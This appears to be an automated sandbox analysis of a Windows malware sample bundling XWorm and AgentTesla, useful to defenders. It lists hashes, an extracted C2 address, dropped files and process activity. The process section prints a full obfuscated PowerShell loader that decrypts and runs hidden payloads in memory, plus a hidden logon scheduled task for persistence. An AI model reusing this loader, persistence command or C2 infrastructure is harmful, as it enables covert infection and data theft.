Analysis
-
max time kernel
1s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted
30-06-2024 13:15
Static task
static1
General
-
Target
Rootkit.exe
-
Size
5.2MB
-
MD5
bb3ad62baa943e12858845f450b52d45
-
SHA1
106833ebedf630c67848569b953b58d734bfbc4f
-
SHA256
696493dcbdadaac33f562d957dcbdcad65993bbbdafa020dd910c797873ebb9d
-
SHA512
a84fb4ace43c878df83c39a8058dd336583ac81225760aad031b04e0039bfde356eae23af689f6e62030da4fd55690f29d80fbf5eaf1bc7cbeac47be559e987c
-
SSDEEP
98304:uIHjlOot0eJu8/Zh84XB5D3DPJNNlQwGPth3rhV6Po0gpFvjM:XpOodumZhjBVDBNN65tZ9BHr
Malware Config
Extracted
xworm
session-chief.gl.at.ply.gg:36125
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
Detect Xworm Payload 1 IoCs
Processes:
resource: behavioral1/memory/4752-77-0x0000024C7F540000-0x0000024C7F556000-memory.dmp yara_rule: family_xworm -
AgentTesla payload 1 IoCs
Processes:
resource: behavioral1/memory/728-55-0x0000000005B10000-0x0000000005D24000-memory.dmp yara_rule: family_agenttesla -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Runs PowerShell with the display window hidden.
Processes:
powershell.exe powershell.exe powershell.exe; pid process: 4396 powershell.exe, 5104 powershell.exe, 4752 powershell.exe -
Processes:
resource / yara_rule: C:\Users\Admin\AppData\Local\SpyderCrypter.exe themida; C:\Users\Admin\AppData\Local\SpyderCrypter.exe themida; C:\Users\Admin\AppData\Local\SpyderCrypter.exe themida; behavioral1/memory/728-38-0x0000000000290000-0x0000000000C9C000-memory.dmp themida; behavioral1/memory/728-40-0x0000000000290000-0x0000000000C9C000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow: 24 ioc: ip-api.com
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rootkit.exe "C:\Users\Admin\AppData\Local\Temp\Rootkit.exe" 1⤵
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" " 2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_44_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_44.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force 4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_44.vbs" 4⤵
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_44.bat" " 5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Roaming\startup_str_44.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exe "C:\Users\Admin\AppData\Local\SpyderCrypter.exe" 2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log Filesize
3KB
MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Filesize
1KB
MD5 3c2a00f0fd823b88bf228b8472979845
SHA1 5dcc2f4e9282bdeb5d9f1b4ff6e790b8636d1482
SHA256 aaabc9856198107bc7a94bff5bcba1cd02e7adc24527e8794300e57ee7dd2ba4
SHA512 7f90eedab256355659676eddfa504a6fb08f016c610166b4abbea5b0d6a94a1c834ebae011eefdd68e23df4558c3a72c33ef887de7d62d70ea179bbd8b01fce9
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exe Filesize
1.7MB
MD5 6f469fbde4beccd5414d8cf074fbac5c
SHA1 9ddff8409b73a606265e2af867700a09fe8c6f29
SHA256 4d4c79649623e2f1df7333fba0719e2bcab780b54195573f72e89b7f17d9745c
SHA512 f3230224fe158693995cc74cd164731e77197562604a30feb4fe3ef86f6c770ea238d8012aabf4a61174aabd71a5001edb9a5338deb021cc599f5a85069cdfc4
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exe Filesize
1.2MB
MD5 d4f5ba2752470f66cd3fad4f3632ff80
SHA1 61d983b82ae81e1e1d974749a55736a52adbdf9a
SHA256 e421f19253131c2f87221840dc4c3c88aa0a3d2e1a9b68b8fa015adb84afab9d
SHA512 46557f35c34f2612fdac835aa3a6d56280a8f66783bc7424978bbca8513b20842bf9f8f9dc8fa7e18c79927eef21f1e6eb4a5d803669d8c6d8de0bcd969cea8c
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exe Filesize
1.4MB
MD5 3519b16f3a49393c3d9ce298fe030ca5
SHA1 d915e3788205e5c5d43cfc0287acb0b6cf19db89
SHA256 28ddafd4a8e8cc5d5cde37ddf3f6239b4f2510cd1bd6e659cbb9cb841800abeb
SHA512 088b3987bb93b761a2fd213eaf3c2f6e8da8ead1709e22747360506ee93e2e8fc10a4450ec02a31a575291cc11f43d5090cf4c0ba888243b2db01297998c228c
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2idkmm4.fti.ps1 Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\svchost.bat Filesize
287KB
MD5 9be1452fccb6a9ca2b3e28b89d0c879e
SHA1 8fe95b338be85b1ceac233a51abf3c59890741a7
SHA256 fa57646f828af97268c76a06db56ef3c7dbc6c87d8b3a49579783b346c1ef6b6
SHA512 f2376350ff5e8b5c405c3e48370a22d140249c77a3c5b69f88e55c87f5f643f501a95f1dcf3e361619562ca4fdefa403caed95cb26bb6250c4a62a270803474f
-
C:\Users\Admin\AppData\Roaming\startup_str_44.vbs Filesize
114B
MD5 5618b50be7ed58e1ddf340dc9b0c8cec
SHA1 a98e2497af8e110438d727f02e6a0375a378ad4c
SHA256 a227ea8019965528a5e3b5a8b8f3ebb17cceaaa493ceb895a1285aa38455be11
SHA512 31857325a9bb6713a6df044c4be291333ccefaa62b4edb4ba69d671c3c2de509143760b10ea84f1c8b121ec4723982f8941a95f5f413bbdc6a89dc8c15c108ca
-
memory/728-20-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-38-0x0000000000290000-0x0000000000C9C000-memory.dmp Filesize
10.0MB
-
memory/728-22-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-24-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-23-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-25-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-85-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-84-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-80-0x0000000077580000-0x0000000077581000-memory.dmp Filesize
4KB
-
memory/728-78-0x0000000000290000-0x0000000000C9C000-memory.dmp Filesize
10.0MB
-
memory/728-40-0x0000000000290000-0x0000000000C9C000-memory.dmp Filesize
10.0MB
-
memory/728-41-0x0000000005E10000-0x00000000063B4000-memory.dmp Filesize
5.6MB
-
memory/728-42-0x0000000005710000-0x00000000057A2000-memory.dmp Filesize
584KB
-
memory/728-21-0x0000000077560000-0x0000000077650000-memory.dmp Filesize
960KB
-
memory/728-54-0x00000000056B0000-0x00000000056BA000-memory.dmp Filesize
40KB
-
memory/728-55-0x0000000005B10000-0x0000000005D24000-memory.dmp Filesize
2.1MB
-
memory/728-19-0x0000000077580000-0x0000000077581000-memory.dmp Filesize
4KB
-
memory/728-17-0x0000000000290000-0x0000000000C9C000-memory.dmp Filesize
10.0MB
-
memory/728-79-0x0000000008820000-0x00000000088D0000-memory.dmp Filesize
704KB
-
memory/4396-43-0x000002227A440000-0x000002227A478000-memory.dmp Filesize
224KB
-
memory/4396-39-0x000002225F930000-0x000002225F938000-memory.dmp Filesize
32KB
-
memory/4396-33-0x000002227A1D0000-0x000002227A1F2000-memory.dmp Filesize
136KB
-
memory/4752-77-0x0000024C7F540000-0x0000024C7F556000-memory.dmp Filesize
88KB
-
memory/4820-1-0x00000000002A0000-0x00000000007D2000-memory.dmp Filesize
5.2MB
-
memory/4820-0-0x00007FFCE8BB3000-0x00007FFCE8BB5000-memory.dmp Filesize
8KB